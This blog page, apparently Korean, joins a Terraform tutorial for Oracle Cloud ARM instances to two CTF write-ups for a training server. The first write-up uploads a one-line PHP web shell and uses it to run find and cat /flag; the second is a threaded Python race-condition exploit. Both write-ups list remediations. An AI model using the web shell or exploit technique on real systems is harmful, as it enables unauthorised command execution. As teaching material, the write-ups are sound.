
echo "Body: $BODY"

RESULT=$(curl -sk -X POST https://127.0.0.1:3443/api/invites/pcp_invite_<번호>/accept \
  -H 'Content-Type: application/json' \
  -d "$BODY" 2>&1)

echo "Response: $RESULT"

# Save response for later claim
echo "$RESULT" > /tmp/join_response.json

# 서버에서 실행
chmod +x /home/ubuntu/join_paperclip.sh

# 초대 코드를 스크립트 안에 설정한 뒤 실행
bash /home/ubuntu/join_paperclip.sh

Inbox에서 초대를 수락합니다.

Terraform 활용한 Oracle Cloud 인스턴스 생성

wogho — Thu, 2 Apr 2026 05:06:55 +0900

OCI는 장기적인 인프라 관리의 어려움과 장기간 미사용에 대한 서버처리로 인해서
지속적으로 프로비저닝 해야하는 큰 불편이 있습니다.

해당 글은 Terraform를 활용하여 Oracle Cloud 인스턴스 생성하는 과정을 작성해보았습니다.
오라클 클라우드 계정이 없다면 아래 링크를 통하여 가입을 진행합니다.

가입 시 별도의 신용카드가 필요합니다.

https://signup.cloud.oracle.com/

Oracle Cloud Free Tier Signup

signup.cloud.oracle.com

무료 계정이 사용할 수 있는 사양은 다음과 같습니다.

AMD 기반 표준 인스턴스 (최대 2개) - 1/8 OCPU, 1GB RAM

ARM 기반 Ampere A1 인스턴스 - 최대 4 OCPU, 24GB RAM

ARM을 통하여 인스턴스 생성을 다뤄 보도록하겠습니다.

ARM은 스마트폰 기반 아키텍처이므로 호환성 문제와 도커 사용이 무리가 있습니다.
하지만, OpenClaw 같은 오픈소스 활용하기에는 제약은 없습니다.

OpenClaw 이용해서 도커나 다양한 걸 시도하고 싶으신 분은
hostinger 원클릭 서비스를 이용해보시거나 로컬, 맥미니 이용하시길 바랍니다.
https://www.hostinger.com/kr?REFERRALCODE=SN6DNLDP5WL6

Terraform 설치

https://developer.hashicorp.com/terraform/install

Install | Terraform | HashiCorp Developer

Explore Terraform product documentation, tutorials, and examples.

developer.hashicorp.com

공식 홈페이지 혹은 아래 코드를 통하여 Terraform를 설치하도록합니다.

winget install HashiCorp.Terraform
terraform -version

Terraform이 OCI API를 호출하려면 API Signing Key가 필요합니다.

# Windows PS에서 PEM 키 쌍 생성
ssh-keygen -t rsa -b 2048 -f C:\Users\(사용자이름)\.ssh\my_key.pem -N ""

OCI 콘솔 → 우측 상단 프로필 아이콘 → 사용자 설정

좌측 메뉴 → API 키 → API 키 추가

퍼블릭 키 붙여넣기 선택 → my_key.pem.pub 내용 붙여넣기

my_key.pem의 텍스트를 전부 복사합니다.
(-----BEGIN PUBLIC KEY-----부터 -----END PUBLIC KEY-----까지 전부 포함해야 합니다.)

추가 후 표시되는 구성 파일 미리보기에서 다음 값 확인합니다.:
   - tenancy (Tenancy OCID)
   - user (User OCID)
   - fingerprint
   - region

최종적으로 필요한 OCID 정보는 다음과 같습니다.
Tenancy OCID: 관리 → 테넌시 세부정보
User OCID: 프로필 → 사용자 설정
Compartment OCID: ID → 구획 (root compartment = tenancy OCID)
Availability Domain: 컴퓨트 → 인스턴스 → 인스턴스 생성 화면에서 확인

OCI CLI 설치

테라폼이 오라클 계정에 로그인할 수 있도록 OCI CLI를 설치하고 설정해야 합니다.

PowerShell를 실행합니다.

# 1. 스크립트 실행 권한 허용
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser

# 2. 설치 스크립트 다운로드 및 실행
powershell -ExecutionPolicy RemoteSigned -Command "iex ([(Array)(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/oracle/oci-cli/master/scripts/install/install.ps1')])"

oci -v

oci setup config

설치 후 oci setup config 명령어를 입력합니다.

이때 오라클 클라우드 콘솔에서 내 계정의 User OCID와 Tenancy OCID

그리고 현재 사용 중인 리전 정보를 입력해야 합니다.

설정 과정에서 API 서명 키는 이미 생성했으므로 스킵합니다.

Terraform 적용

이후 부터는 IDE 사용하여 AI 에이전트를 통해 바이브코딩을 구성하여도 좋습니다.
저는 다음과 같이 적용하였습니다.

oci-project/
├── infra/
│   ├── provider.tf      # OCI 프로바이더 인증 설정
│   ├── variables.tf     # compartment_id, availability_domain
│   └── main.tf          # VCN, 서브넷, 보안 목록, 인스턴스
├── apps/
│   ├── provider.tf
│   └── install_apps.tf  # 앱 설치 (openclaw, paperclip 기타 오픈소스)
└── connect.rdp          # RDP 접속 파일

provider.tf

provider.tf는 OCI의 계정 정보와 인증 정보를 담습니다.
실제 운영 시에는 OCID, fingerprint를 terraform.tfvars나 환경변수로 분리하는것을 권고합니다.

# infra/provider.tf
provider "oci" {
  tenancy_ocid     = "ocid1.tenancy.oc1..aaaa..."   # Tenancy OCID
  user_ocid        = "ocid1.user.oc1..aaaa..."       # User OCID
  fingerprint      = "9d:bd:22:ef:f8:b7:45:ff:..."   # API 키 fingerprint
  private_key_path = "C:/Users/(사용자이름)/.ssh/my_key.pem"   # API 서명용 PEM 키
  region           = "ap-seoul-1"                     # 홈 리전
}

variables.tf

variables.tf는 입력하는 변수에 대해서 지정합니다.
상시 변화되는 값을 이곳에 분리 하여 저장하도록 관리 하였습니다.

여기서 인스턴스 가용성 도메인(AD)은 인스턴스 생성할 리전을 의미합니다.
국내에서 생성 할 수 있는 무료 인스턴스가 한정 되어있기 때문에 오류가 발생한다면
일본으로 변경하거나 다른 지역으로 변경해야합니다.

variable "compartment_id" {
  description = "OCI Compartment OCID (기본값: root tenancy)"
  default     = "ocid1.tenancy.oc1..aaaa..."
}

variable "availability_domain" {
  description = "인스턴스 가용성 도메인"
  default     = "GQyV:AP-SEOUL-1-AD-1"
}

가용성 도메인 확인 방법

OCI 콘솔 또는 CLI로 확인:

oci iam availability-domain list --compartment-id <테넌시_ocid>

main.rf

main은 VCN, 서브넷, 보안 목록, 인스턴스 항목을 정의 합니다.

1. 프로바이더 설정 (OCI)
2. VCN 및 서브넷 생성
3. 인터넷 게이트웨이 및 라우팅 테이블 연결
4. 보안 목록(Security List) 생성 (SSH, RDP 포트 개방)
5. Compute Instance (ARM) 생성 및 user_data (설치 스크립트) 적용

사용자 요구사항에 맞게 설정 하도록 합니다.

# 1. 가상 네트워크 및 기본 보안 설정
resource "oci_core_vcn" "paperclip_vcn" {
  compartment_id = var.compartment_id
  cidr_block     = "10.0.0.0/16"
  display_name   = "paperclip-vcn"
  dns_label      = "paperclip"
}

resource "oci_core_internet_gateway" "ig" {
  compartment_id = var.compartment_id
  vcn_id         = oci_core_vcn.paperclip_vcn.id
  display_name   = "internet-gateway"
}

resource "oci_core_default_route_table" "rt" {
  manage_default_resource_id = oci_core_vcn.paperclip_vcn.default_route_table_id
  route_rules {
    destination       = "0.0.0.0/0"
    network_entity_id = oci_core_internet_gateway.ig.id
  }
}

resource "oci_core_security_list" "paperclip_sl" {
  compartment_id = var.compartment_id
  vcn_id         = oci_core_vcn.paperclip_vcn.id
  display_name   = "paperclip-security-list"

  ingress_security_rules { # SSH
    protocol = "6"
    source   = "0.0.0.0/0"
    tcp_options {
      min = 22
      max = 22
    }
  }

  ingress_security_rules { # Paperclip UI
    protocol = "6"
    source   = "0.0.0.0/0"
    tcp_options {
      min = 3100
      max = 3100
    }
  }

  # RDP 접속을 위한 3389 포트
  ingress_security_rules {
    protocol    = "6"
    source      = "0.0.0.0/0"
    description = "Allow RDP"
    tcp_options {
      min = 3389
      max = 3389
    }
  }

  ingress_security_rules { # OpenClaw Gateway
    protocol    = "6"
    source      = "0.0.0.0/0"
    description = "Allow OpenClaw Gateway"
    tcp_options {
      min = 18789
      max = 18789
    }
  }

  ingress_security_rules { # HTTPS — OpenClaw Control UI
    protocol    = "6"
    source      = "0.0.0.0/0"
    description = "Allow HTTPS (OpenClaw)"
    tcp_options {
      min = 443
      max = 443
    }
  }

  ingress_security_rules { # HTTPS — Paperclip
    protocol    = "6"
    source      = "0.0.0.0/0"
    description = "Allow HTTPS (Paperclip)"
    tcp_options {
      min = 3443
      max = 3443
    }
  }

  egress_security_rules {
    protocol    = "all"
    destination = "0.0.0.0/0"
  }
}

resource "oci_core_subnet" "paperclip_subnet" {
  cidr_block        = "10.0.1.0/24"
  compartment_id    = var.compartment_id
  vcn_id            = oci_core_vcn.paperclip_vcn.id
  display_name      = "paperclip-subnet"
  dns_label         = "subnet1"
  security_list_ids = [oci_core_security_list.paperclip_sl.id]
}

# 인스턴스 생성 (Ubuntu 24.04 ARM)
resource "oci_core_instance" "paperclip_arm" {
  availability_domain = var.availability_domain
  compartment_id      = var.compartment_id
  shape               = "VM.Standard.A1.Flex"

  shape_config {
    ocpus         = 4
    memory_in_gbs = 24
  }

  source_details {
    source_type = "image"
    source_id   = "<OCI 콘솔에서 확인한 Ubuntu 24.04 ARM 이미지 OCID>"
  }

  create_vnic_details {
    subnet_id        = oci_core_subnet.paperclip_subnet.id
    assign_public_ip = true
  }

  metadata = {
    ssh_authorized_keys = file("<SSH 공개키 경로, 예: ~/.ssh/my_key.pem.pub>")

    # Ubuntu 24.04 ARM용 자동 설치 스크립트 (오류 대비 강화)
    # ubuntu-desktop + xrdp 전용 구성
    user_data = base64encode(<<-EOT
      #!/bin/bash
      # ── 로그 설정: 모든 출력을 파일 + 콘솔에 동시 기록 ──
      LOG_FILE="/var/log/setup-script.log"
      exec > >(tee -a "$LOG_FILE") 2>&1
      echo "=== 설치 시작: $(date '+%Y-%m-%d %H:%M:%S') ==="

      # ════════════════════════════════════════════════════════════
      # 유틸리티 함수 정의
      # ════════════════════════════════════════════════════════════

      # apt 재시도 함수 (최대 5회, 실패마다 apt-get update 재실행)
      apt_install_with_retry() {
        local pkgs="$*"
        local max=5
        local n=1
        while [ $n -le $max ]; do
          echo "[apt] 시도 $n/$max: $pkgs"
          if apt-get install -y --fix-missing \
              -o Dpkg::Options::="--force-confold" \
              -o Dpkg::Options::="--force-confdef" \
              -o Acquire::Retries=3 \
              $pkgs; then
            echo "[apt] 성공: $pkgs"
            return 0
          fi
          echo "[apt] 실패($n/$max). 저장소 재갱신 후 60초 대기..."
          # broken 패키지 복구 후 재갱신
          dpkg --configure -a 2>/dev/null || true
          apt-get -f install -y 2>/dev/null || true
          apt-get update --fix-missing -o Acquire::Retries=3 || true
          sleep 60
          n=$((n + 1))
        done
        echo "[apt] 최종 실패: $pkgs → dpkg 직접 설치 방식으로 전환"
        return 1  # 호출부에서 dpkg 폴백 분기 처리
      }

      # dpkg 직접 설치 함수 (공식 Launchpad/GitHub releases에서 .deb 다운로드)
      dpkg_install_from_url() {
        local name="$1"
        local url="$2"
        local deb="/tmp/$${name}.deb"
        echo "[dpkg] $name .deb 직접 다운로드: $url"
        local max=5
        local n=1
        while [ $n -le $max ]; do
          if curl -fsSL --retry 3 --retry-delay 10 -o "$deb" "$url"; then
            echo "[dpkg] 다운로드 완료 → dpkg -i 설치 시도"
            dpkg -i "$deb" && echo "[dpkg] 설치 성공: $name" && return 0
            echo "[dpkg] dpkg 실패, 의존성 해결 시도..."
            apt-get -f install -y || true
            dpkg -i "$deb" && echo "[dpkg] 재시도 성공: $name" && return 0
          fi
          echo "[dpkg] 다운로드 실패($n/$max). 30초 후 재시도..."
          sleep 30
          n=$((n + 1))
        done
        echo "[dpkg] 최종 실패: $name"
        return 1
      }

      # systemctl 안전 실행 (서비스 존재 여부 먼저 확인)
      safe_systemctl() {
        local action="$1"
        local svc="$2"
        if systemctl list-unit-files --type=service 2>/dev/null | grep -q "^$${svc}"; then
          systemctl "$action" "$svc" \
            && echo "[systemctl] $svc $action 완료" \
            || echo "[systemctl] $svc $action 실패 (무시)"
        else
          echo "[systemctl] '$svc' 서비스 없음 → 건너뜀"
        fi
      }

      # ════════════════════════════════════════════════════════════
      # 1. 환경 변수 (팝업 방지)
      # ════════════════════════════════════════════════════════════
      export DEBIAN_FRONTEND=noninteractive
      export UCF_FORCE_CONFOLD=1
      export NEEDRESTART_MODE=a

      timedatectl set-timezone Asia/Seoul || echo "[tz] 시간대 설정 실패 (무시)"

      # ════════════════════════════════════════════════════════════
      # 2. 스왑 메모리 (4GB)
      # ════════════════════════════════════════════════════════════
      echo "=== 스왑 설정 ==="
      if [ ! -f /swapfile ]; then
        fallocate -l 4G /swapfile \
          || dd if=/dev/zero of=/swapfile bs=1M count=4096 status=progress
        chmod 600 /swapfile
        mkswap /swapfile
        swapon /swapfile
        echo '/swapfile none swap sw 0 0' >> /etc/fstab
        echo "[swap] 완료"
      else
        echo "[swap] 스왑파일 이미 존재 → 건너뜀"
      fi
      sysctl vm.swappiness=10 || true
      echo 'vm.swappiness=10' >> /etc/sysctl.conf

      # ════════════════════════════════════════════════════════════
      # 3. iptables 방화벽 규칙 설정 (OCI 기본 정책: INPUT DROP 대비)
      #    - OCI Ubuntu 이미지는 기본 iptables 정책이 DROP이므로
      #      SSH(22), RDP(3389) 포트를 명시적으로 허용해야 함
      # ════════════════════════════════════════════════════════════
      echo "=== iptables 방화벽 규칙 설정 ==="

      # SSH(22) 허용 - 최우선 삽입 (잠기지 않도록 보장)
      iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT \
        && echo "[iptables] SSH(22) 허용 완료" \
        || echo "[iptables] SSH(22) 규칙 추가 실패"

      # RDP(3389) 허용
      iptables -I INPUT 2 -p tcp --dport 3389 -j ACCEPT \
        && echo "[iptables] RDP(3389) 허용 완료" \
        || echo "[iptables] RDP(3389) 규칙 추가 실패"

      # ESTABLISHED/RELATED 허용 (응답 패킷 허용)
      iptables -I INPUT 3 -m state --state ESTABLISHED,RELATED -j ACCEPT \
        || true

      # loopback 허용
      iptables -I INPUT 4 -i lo -j ACCEPT \
        || true

      # 규칙 영구 저장 (재부팅 후에도 유지)
      mkdir -p /etc/iptables
      iptables-save > /etc/iptables/rules.v4 \
        && echo "[iptables] 규칙 영구 저장 완료 (/etc/iptables/rules.v4)" \
        || echo "[iptables] 규칙 저장 실패"

      # 재부팅 시 자동 복원을 위한 rc.local 등록
      if [ ! -f /etc/rc.local ]; then
        echo '#!/bin/bash' > /etc/rc.local
        chmod +x /etc/rc.local
      fi
      grep -q 'iptables-restore' /etc/rc.local \
        || echo 'iptables-restore < /etc/iptables/rules.v4' >> /etc/rc.local

      echo "[iptables] 현재 INPUT 규칙:"
      iptables -L INPUT -n --line-numbers 2>/dev/null | head -20 || true

      # ════════════════════════════════════════════════════════════
      # 4. apt-get update (최대 5회 재시도)
      # ════════════════════════════════════════════════════════════
      echo "=== apt-get update ==="
      for i in 1 2 3 4 5; do
        if apt-get update --fix-missing -o Acquire::Retries=3; then
          echo "[update] 성공"
          break
        fi
        echo "[update] 실패($i/5). 30초 후 재시도..."
        sleep 30
      done

      # 선행 필수 도구 설치
      apt_install_with_retry ca-certificates curl gnupg lsb-release apt-transport-https \
        || true

      # 기존 패키지 업그레이드
      apt-get upgrade -y \
        -o Dpkg::Options::="--force-confold" \
        -o Dpkg::Options::="--force-confdef" \
        || echo "[upgrade] 경고 발생 (무시하고 계속)"

      # ════════════════════════════════════════════════════════════
      # 4. ubuntu-desktop 설치
      #    실패 시: universe 저장소 추가 후 재시도 → 최종 실패 시 기록
      # ════════════════════════════════════════════════════════════
      echo "=== ubuntu-desktop 설치 (10~20분 소요) ==="

      DESKTOP_OK=false

      # 1차: 기본 저장소로 시도
      if apt_install_with_retry ubuntu-desktop; then
        DESKTOP_OK=true
        echo "[desktop] apt(기본 저장소) 설치 성공"
      else
        echo "[desktop] 기본 저장소 실패 → universe/PPA 저장소 추가 후 재시도"

        # 2차: universe 저장소 활성화 후 재시도
        add-apt-repository -y universe || true
        add-apt-repository -y multiverse || true
        apt-get update --fix-missing -o Acquire::Retries=3 || true

        if apt_install_with_retry ubuntu-desktop; then
          DESKTOP_OK=true
          echo "[desktop] apt(universe 저장소) 설치 성공"
        else
          echo "[desktop] 저장소 방식 모두 실패 → 최종 실패로 기록"
          DESKTOP_OK=false
        fi
      fi

      # ════════════════════════════════════════════════════════════
      # 5. xrdp 설치
      #    실패 시 1: Launchpad PPA(neutrinolabs) 추가 후 재시도
      #    실패 시 2: GitHub releases에서 .deb 직접 다운로드 → dpkg 설치
      # ════════════════════════════════════════════════════════════
      echo "=== xrdp 설치 ==="

      XRDP_OK=false

      # 1차: 기본 apt 시도
      if apt_install_with_retry xrdp; then
        XRDP_OK=true
        echo "[xrdp] apt(기본) 설치 성공"
      else
        echo "[xrdp] 기본 apt 실패 → neutrinolabs PPA 추가 후 재시도"

        # 2차: 공식 PPA 추가
        add-apt-repository -y ppa:neutrinolabs/xrdp || true
        apt-get update --fix-missing -o Acquire::Retries=3 || true

        if apt_install_with_retry xrdp; then
          XRDP_OK=true
          echo "[xrdp] PPA 설치 성공"
        else
          echo "[xrdp] PPA도 실패 → GitHub releases에서 .deb 직접 설치"

          # 3차: GitHub releases에서 최신 .deb 직접 다운로드
          # ARM64(aarch64) 대상 .deb 파일을 neutrinolabs/xrdp 공식 릴리스에서 획득
          XRDP_VER="0.10.1"
          XRDP_DEB_URL="https://github.com/neutrinolabs/xrdp/releases/download/v$${XRDP_VER}/xrdp_$${XRDP_VER}-1_arm64.deb"

          if dpkg_install_from_url "xrdp" "$XRDP_DEB_URL"; then
            XRDP_OK=true
            echo "[xrdp] .deb 직접 설치 성공"
          else
            echo "[xrdp] 모든 설치 방법 실패 → 수동 확인 필요"
            XRDP_OK=false
          fi
        fi
      fi

      # xrdp 서비스 활성화 (설치 성공 시)
      if [ "$XRDP_OK" = true ] && command -v xrdp > /dev/null 2>&1; then
        safe_systemctl enable xrdp
        safe_systemctl start xrdp
        # ssl-cert 그룹에 xrdp 추가 (TLS 인증서 접근 권한)
        usermod -aG ssl-cert xrdp 2>/dev/null \
          || adduser xrdp ssl-cert 2>/dev/null \
          || echo "[xrdp] ssl-cert 그룹 추가 실패 (무시)"
        echo "[xrdp] 서비스 활성화 완료"
      fi

      # ════════════════════════════════════════════════════════════
      # 6. RDP 접속용 비밀번호 설정
      # ════════════════════════════════════════════════════════════
      echo "ubuntu:<RDP 접속용 비밀번호>" | chpasswd \
        && echo "[passwd] ubuntu 비밀번호 설정 완료" \
        || echo "[passwd] 비밀번호 설정 실패"

      # ════════════════════════════════════════════════════════════
      # 7. Docker 설치
      #    1차: get.docker.com 공식 스크립트
      #    2차: apt docker.io (Ubuntu 공식 패키지)
      #    3차: GitHub releases에서 docker-ce .deb 직접 설치
      # ════════════════════════════════════════════════════════════
      echo "=== Docker 설치 ==="

      DOCKER_OK=false

      if command -v docker > /dev/null 2>&1; then
        DOCKER_OK=true
        echo "[docker] 이미 설치됨 → 건너뜀"
      else
        # 1차: 공식 install 스크립트
        echo "[docker] get.docker.com 스크립트 시도..."
        if curl -fsSL --retry 5 --retry-delay 10 https://get.docker.com -o /tmp/get-docker.sh \
            && sh /tmp/get-docker.sh; then
          DOCKER_OK=true
          echo "[docker] 공식 스크립트 설치 성공"
        else
          echo "[docker] 공식 스크립트 실패 → apt docker.io 시도"

          # 2차: Ubuntu 공식 패키지
          if apt_install_with_retry docker.io docker-compose-plugin; then
            DOCKER_OK=true
            echo "[docker] apt(docker.io) 설치 성공"
          else
            echo "[docker] apt 실패 → Docker CE 공식 저장소 추가 후 재시도"

            # 3차: Docker 공식 apt 저장소 직접 구성
            install -m 0755 -d /etc/apt/keyrings
            curl -fsSL https://download.docker.com/linux/ubuntu/gpg \
              | gpg --dearmor -o /etc/apt/keyrings/docker.gpg || true
            chmod a+r /etc/apt/keyrings/docker.gpg

            DISTRO_CODENAME=$(lsb_release -cs 2>/dev/null || echo "noble")
            echo \
              "deb [arch=arm64 signed-by=/etc/apt/keyrings/docker.gpg] \
              https://download.docker.com/linux/ubuntu $DISTRO_CODENAME stable" \
              > /etc/apt/sources.list.d/docker.list

            apt-get update --fix-missing -o Acquire::Retries=3 || true

            if apt_install_with_retry docker-ce docker-ce-cli containerd.io docker-compose-plugin; then
              DOCKER_OK=true
              echo "[docker] Docker CE 공식 저장소 설치 성공"
            else
              echo "[docker] 모든 방법 실패 → 수동 확인 필요"
            fi
          fi
        fi
      fi

      if [ "$DOCKER_OK" = true ] && command -v docker > /dev/null 2>&1; then
        usermod -aG docker ubuntu || true
        safe_systemctl enable docker
        safe_systemctl start docker
        echo "[docker] 완료: $(docker --version)"
      fi

      # ════════════════════════════════════════════════════════════
      # 8. 설치 완료 상태 기록
      # ════════════════════════════════════════════════════════════
      STATUS_FILE="/home/ubuntu/setup_done.txt"
      {
        echo "=== 설치 완료: $(date '+%Y-%m-%d %H:%M:%S') ==="
        echo ""
        echo "[ubuntu-desktop] $(dpkg -l ubuntu-desktop 2>/dev/null | grep '^ii' | awk '{print "installed: "$3}' || echo 'not installed')"
        echo "[xrdp]           $(systemctl is-active xrdp 2>/dev/null || echo 'not found') / $(dpkg -l xrdp 2>/dev/null | grep '^ii' | awk '{print $3}' || echo 'not installed')"
        echo "[docker]         $(docker --version 2>/dev/null || echo 'not installed')"
        echo ""
        echo "전체 로그: $LOG_FILE"
        echo ""
        echo "접속 확인 명령어 (SSH 접속 후):"
        echo "  systemctl status xrdp"
        echo "  tail -f /var/log/setup-script.log"
        echo "  tail -f /var/log/cloud-init-output.log"
      } > "$STATUS_FILE"
      chown ubuntu:ubuntu "$STATUS_FILE"

      echo "=== 스크립트 완료: $(date '+%Y-%m-%d %H:%M:%S') ==="
    EOT
    )
  }
}

# ════════════════════════════════════════════════════════════
# Outputs
# ════════════════════════════════════════════════════════════
output "instance_public_ip" {
  description = "인스턴스 공인 IP (apps/install_apps.tf의 server_ip에 입력)"
  value       = oci_core_instance.paperclip_arm.public_ip
}

output "instance_id" {
  description = "인스턴스 OCID"
  value       = oci_core_instance.paperclip_arm.id
}

제가 구성했던 포트는 다음과 같습니다.

22 - SSH 접속
443 - OpenClaw HTTPS (nginx 프록시)
3100 - Paperclip HTTP (직접 또는 내부)
3389 - RDP 원격 데스크톱
3443 - Paperclip HTTPS (nginx 프록시)
18789 -OpenClaw Gateway (원본 HTTP)

인스턴스 이미지의 OCID 찾는 방법은 다음과 같습니다.

OCI 콘솔 → 컴퓨트 → 이미지 → 플랫폼 이미지 필터 → Ubuntu 24.04 aarch64 선택 → OCID 복사

또는

oci compute image list --compartment-id <compartment_ocid> `
  --operating-system "Canonical Ubuntu" `
  --shape "VM.Standard.A1.Flex" `
  --sort-by TIMECREATED --sort-order DESC `
  --query "data[0].id" --raw-output

cloud-init 서버 초기 설정

핵심 설계 원칙은 모든 설치 단계에 3중 폴백을 적용했습니다.
OCI ARM 인스턴스는 패키지 미러 불안정이 잦아서, 한 가지 방법만 쓰면 실패 확률이 높기 때문입니다.

로그 설정: `/var/log/setup-script.log`에 전체 기록
유틸리티 함수: `apt_install_with_retry` (5회 재시도), `dpkg_install_from_url` (폴백), `safe_systemctl`
환경 변수: `DEBIAN_FRONTEND=noninteractive` (팝업 방지)
스왑: 4GB 스왑파일 생성 (메모리 부족 대비)
iptables: SSH(22), RDP(3389) 포트 열기 + 영구 저장
apt 업데이트: 5회 재시도, 의존성 자동 복구
ubuntu-desktop: GUI 데스크톱 설치 (RDP 접속용)
xrdp: RDP 서버 (1차 apt → 2차 PPA → 3차 .deb 직접 설치)
Docker: 1차 get.docker.com → 2차 apt → 3차 공식 저장소
비밀번호: ubuntu 계정 비밀번호 설정 (RDP 로그인용)

로그 확인:

# SSH 접속 후
tail -f /var/log/setup-script.log       # 커스텀 스크립트 로그
tail -f /var/log/cloud-init-output.log  # cloud-init 전체 로그
cat /home/ubuntu/setup_done.txt         # 설치 완료 요약

Terraform 실행

cd C:\oci-project\infra

# 프로바이더 다운로드
terraform init

# 변경 사항 미리 확인
terraform plan

# 인프라 생성 (VCN + 서브넷 + 인스턴스)
terraform apply

apply 완료까지 약 3-5분 소요되며.

cloud-init은 백그라운드에서 10-20분 추가 실행됩니다.

# 생성된 IP 확인

terraform output instance_public_ip

# SSH 접속 확인

ssh -i C:\Users\jh\.ssh\my_key.pem ubuntu@<IP>

기타 사항

OCI Always Free ARM 인스턴스가 안 만들어질 때

Out of capacity 에러가 뜬다면 해당 리전에 ARM 자원이 없다는 것입니다.

- 다른 Availability Domain 시도 (서울은 1개뿐이라 해당 없음)
- 시간대를 바꿔서 재시도 (새벽 시간에 자원 반납이 많음)
- shape_config에서 OCPU/메모리를 줄여서 시도 (1 OCPU / 6GB로 시작)
- 자동 재시도 스크립트 활용

iptables

OCI Ubuntu 이미지는 기본 iptables 정책이 INPUT DROP 입니다.
Security List에서 포트를 열어도 OS 레벨에서 차단되므로, 반드시 iptables도 설정해야 합니다.

# REJECT 규칙보다 앞에 ACCEPT 삽입
sudo iptables -I INPUT 1 -p tcp --dport 443 -j ACCEPT
sudo iptables-save | sudo tee /etc/iptables.rules

Terraform 상태 파일

terraform.tfstate는 로컬에 저장되므로, 이 파일이 없으면 Terraform은 기존 리소스를 인식하지 못합니다.

# .gitignore에 반드시 추가
*.tfstate
*.tfstate.backup
.terraform/

다음글은 완전 무료로 사용이 가능한
OpenClaw + Github Copilot (GPT5-mini) 모델 설치와 Paperclip 연동에 대해서 작성해보겠습니다.

9 File Upload

wogho — Wed, 22 Jan 2025 13:32:07 +0900

목표

취약한 파일 업로드 기능을 악용하여 웹셸(Webshell)을 업로드.
서버에서 명령어 실행을 통해 플래그 파일(/flag) 내용 획득.

문제 분석

파일 업로드 기능:
- 파일 업로드 기능이 적절히 검증되지 않음.
- PHP 파일과 같은 실행 가능한 파일 업로드 가능.
업로드된 파일 실행 가능:
- 업로드된 파일의 URL 경로를 통해 해당 파일을 직접 실행 가능.
플래그 파일 경로 탐색:
- /flag 파일이 서버에 존재하며, 이를 탐색 및 읽어야 함.

공격 과정

1. 웹셸 작성:

system() 함수로 서버에서 명령어를 실행.
URL 파라미터 id를 통해 명령어 전달.

<?php echo system($_GET['id']); ?>

2. 웹셸 업로드

웹셸 파일(webshells.php)을 업로드:
- 업로드된 파일의 URL:
  
  http://war.knock-on.org:10007/uploads/file_678c8d3a1e09b0.02931876.php

3. 플래그 파일 탐색

웹셸을 이용하여 플래그 파일 경로 탐색:

http://war.knock-on.org:10007/uploads/file_678c8d3a1e09b0.02931876.php?id=find%20/%20-name%20flag*
결과:
- /flag 파일과 다른 관련 파일 경로를 확인:
  
  /flag /var/www/html/flag /sys/devices/platform/serial8250/tty/ttyS*/flags

4. 플래그 파일 읽기

웹셸을 이용해 /flag 파일의 내용을 읽음:

http://war.knock-on.org:10007/uploads/file_678c8d3a1e09b0.02931876.php?id=cat%20/flag
결과:
- /flag 파일 내용 출력:
  
  K0{Y0u_Up10aded_4_Web5he11!!!}

취약점 분석

문제 원인

파일 업로드 검증 부족:
- 서버는 업로드된 파일의 확장자 및 내용을 제대로 검증하지 않음.
- PHP와 같은 실행 가능한 파일 업로드 허용.
경로 접근 제어 미비:
- 업로드된 파일이 실행 가능하며, 서버의 민감한 경로에 접근 가능.
명령어 실행 허용:
- PHP 파일에서 서버 명령어를 실행할 수 있는 system() 함수 사용.

보안 대책

1. 파일 업로드 검증 강화

화이트리스트 사용:
- 허용된 파일 확장자만 업로드 가능.
MIME 타입 검증:
- 파일의 실제 MIME 타입을 확인하여 서버에서 실행할 수 없는 형식만 허용.
파일 내용 검사:
- 파일 내용에 PHP 코드 등 실행 가능한 코드가 포함되지 않았는지 확인.

2. 업로드된 파일 실행 방지

업로드된 파일을 실행 가능한 디렉토리 외부에 저장:
- 업로드 파일 디렉토리는 웹 서버에서 실행되지 않도록 설정.

3. 서버 명령어 실행 제한

PHP 코드에서 system(), exec() 등 명령어 실행 관련 함수 비활성화.

12.3 Race condition

wogho — Wed, 22 Jan 2025 13:22:39 +0900

문제 정의

Flask 기반 웹 애플리케이션에서 /increase 엔드포인트를 익스플로잇하여 플래그 획득이 목표.
카운터 시스템:
- 초기 카운터 값은 0으로 시작.
- /increase 요청마다 카운터가 1씩 증가.
- 카운터가 15 이상일 때 플래그 반환.

공격 기법: 레이스 컨디션(Race Condition)

레이스 컨디션이란?

동시성 문제가 발생하여 두 개 이상의 요청 또는 스레드가 동일한 자원(예: 카운터 변수)에 동시에 접근.
요청 처리 간 락(Lock) 없이 동작할 경우, 변수 값이 예상과 다르게 처리되거나 비정상적으로 증가.

문제 분석

서버 동작

/increase 엔드포인트:
- 카운터 값을 1 증가.
- 0.1초 지연(sleep(0.1)) 후 값을 저장.
- 카운터 값이 15 이상일 경우 플래그 반환.
멀티스레드 환경:
- 여러 요청이 동시에 /increase로 들어오면, 0.1초 지연 중 다른 요청이 카운터에 접근 가능.
- 이로 인해 한 번의 요청으로 카운터 값이 여러 번 증가.

공격 실행 과정

1. 서버 분석

/increase 엔드포인트는 글로벌 카운터 변수에 의존하며, 0.1초의 지연이 레이스 컨디션 유발 조건.

2. 익스플로잇 코드 작성

Python의 threading 모듈을 사용해 동시 다발적으로 요청.
한 번에 16개의 요청을 보내어 레이스 컨디션 발생.

import requests
from threading import Thread

# 서버 URL
url = "http://war.knock-on.org:10015/increase"

# 요청 함수
def send_request():
    response = requests.get(url)
    if "Success" in response.text:  # 플래그 반환 확인
        print("플래그 발견: ", response.text)
    else:
        print("응답 확인: ", response.text)

# 스레드 리스트
threads = []

# 16개의 스레드를 생성하여 동시 요청
for _ in range(16):
    thread = Thread(target=send_request)
    thread.start()
    threads.append(thread)

# 모든 스레드가 완료될 때까지 대기
for thread in threads:
    thread.join()

3. 플래그 획득

16개의 스레드 요청으로 레이스 컨디션 발생:
- 카운터 값이 한 번의 요청 주기 안에 여러 번 증가.
- 예상보다 빠르게 카운터가 15 이상에 도달.
결과적으로, 서버에서 플래그 반환:

<div class="alert alert-info" role="alert"> Success!! K0{Cl1ck_m00oor3_F4st3r_t0_3XPL01T!!!} </div>
플래그: K0{Cl1ck_m00oor3_F4st3r_t0_3XPL01T!!!}

취약점 분석

문제 원인

락(Lock) 미사용:
- 서버는 요청 간의 데이터 충돌을 방지하기 위한 락을 구현하지 않음.
